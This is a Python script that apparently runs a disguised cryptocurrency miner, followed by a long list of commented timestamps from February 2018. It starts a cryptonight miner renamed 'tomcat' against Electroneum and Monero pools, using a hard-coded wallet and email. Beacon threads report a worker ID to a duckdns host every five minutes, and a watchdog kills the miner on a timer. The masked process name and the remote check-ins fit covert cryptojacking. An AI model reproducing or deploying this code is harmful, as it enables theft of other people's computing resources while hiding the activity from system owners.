import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:29:05.883917
#2018-02-17 16:15:04.714542
#2018-02-17 17:51:08.051212
#2018-02-17 19:23:06.135737
#2018-02-17 20:56:08.176989
#2018-02-17 22:30:01.639495
#2018-02-17 23:59:03.903447
#2018-02-18 01:40:04.439429
#2018-02-18 03:11:01.213884
#2018-02-18 04:46:02.082753
#2018-02-18 06:22:02.169001
#2018-02-18 07:59:07.409014
#2018-02-18 09:31:07.106452
#2018-02-18 11:04:05.508873
#2018-02-18 12:38:01.750569
#2018-02-18 14:12:06.648852
#2018-02-18 15:47:04.079297
#2018-02-18 17:18:06.971857
#2018-02-18 18:51:05.032826
#2018-02-18 20:27:04.965343
#2018-02-18 21:59:05.579765
#2018-02-18 23:35:04.338461
#2018-02-19 01:07:05.651538
#2018-02-19 02:39:07.167704
#2018-02-19 04:12:06.262487
#2018-02-19 05:43:06.622840
#2018-02-19 07:20:06.656063
#2018-02-19 08:54:01.665856
#2018-02-19 10:27:08.071628
#2018-02-19 11:59:08.567854
#2018-02-19 13:30:06.559441
#2018-02-19 15:04:08.789094
#2018-02-19 16:39:06.374583
#2018-02-19 18:12:07.796221
#2018-02-19 19:48:05.064447
#2018-02-19 21:23:05.037150
#2018-02-19 22:56:05.595174
#2018-02-20 00:26:04.567706
#2018-02-20 02:03:07.122134
#2018-02-20 03:38:01.319712
#2018-02-20 05:09:06.625695
#2018-02-20 06:39:03.656335
#2018-02-20 08:14:04.396833
#2018-02-20 09:49:01.452213
#2018-02-20 11:20:06.500295
#2018-02-20 12:57:06.446539
#2018-02-20 14:30:13.340774
#2018-02-20 16:03:07.588859
#2018-02-20 17:40:08.061718
#2018-02-20 19:16:04.364813
#2018-02-20 20:50:10.014073
#2018-02-20 22:22:04.367629
#2018-02-20 23:51:07.421865
#2018-02-21 01:28:07.199864
#2018-02-21 03:05:08.138830
#2018-02-21 04:41:04.636478
#2018-02-21 06:13:06.928028
#2018-02-21 07:47:06.448589
#2018-02-21 09:17:05.577335
#2018-02-21 10:54:09.446291
#2018-02-21 12:26:05.116197
#2018-02-21 14:00:11.117654
#2018-02-21 15:31:08.414504
#2018-02-21 17:13:07.078887
#2018-02-21 18:43:04.963615
#2018-02-21 20:14:06.464130
#2018-02-21 21:50:10.260749
#2018-02-21 23:24:07.114508
#2018-02-22 00:59:06.687548
#2018-02-22 02:32:05.198536
#2018-02-22 04:03:06.280333
#2018-02-22 05:37:06.626414
#2018-02-22 07:08:07.899973
#2018-02-22 08:44:04.385471
#2018-02-22 10:17:01.476819
#2018-02-22 11:46:06.912058
#2018-02-22 13:22:01.490165
#2018-02-22 14:59:07.858152
#2018-02-22 16:28:08.292145
#2018-02-22 18:05:01.524573
#2018-02-22 19:36:08.708306
#2018-02-22 21:15:09.401428
#2018-02-22 22:44:04.853714
#2018-02-23 00:17:08.090553
#2018-02-23 01:55:01.317188
#2018-02-23 03:27:04.894323
#2018-02-23 05:02:05.866723
#2018-02-23 06:31:02.161742
#2018-02-23 08:12:07.496333
#2018-02-23 10:14:07.915163
#2018-02-23 11:40:09.287250
#2018-02-23 13:04:08.845712
#2018-02-23 14:27:07.507523
#2018-02-23 16:06:01.560929
#2018-02-23 17:34:06.031869
#2018-02-23 19:09:07.767864
#2018-02-23 20:43:02.179675
#2018-02-23 22:17:05.698945
#2018-02-23 23:51:06.411065
#2018-02-24 01:27:06.630906
#2018-02-24 03:04:06.263209
#2018-02-24 04:38:01.598445
#2018-02-24 06:09:02.034214
#2018-02-24 07:44:10.350969
#2018-02-24 09:17:05.942470
#2018-02-24 11:03:04.053326
#2018-02-24 12:38:05.000909
#2018-02-24 14:17:02.152187
#2018-02-24 15:48:07.035754
#2018-02-24 17:24:05.349574
#2018-02-24 18:58:05.910701
#2018-02-24 20:30:09.770411
#2018-02-24 22:02:07.149075
#2018-02-25 02:28:03.946571
#2018-02-25 06:08:05.491683
#2018-02-25 11:38:06.385773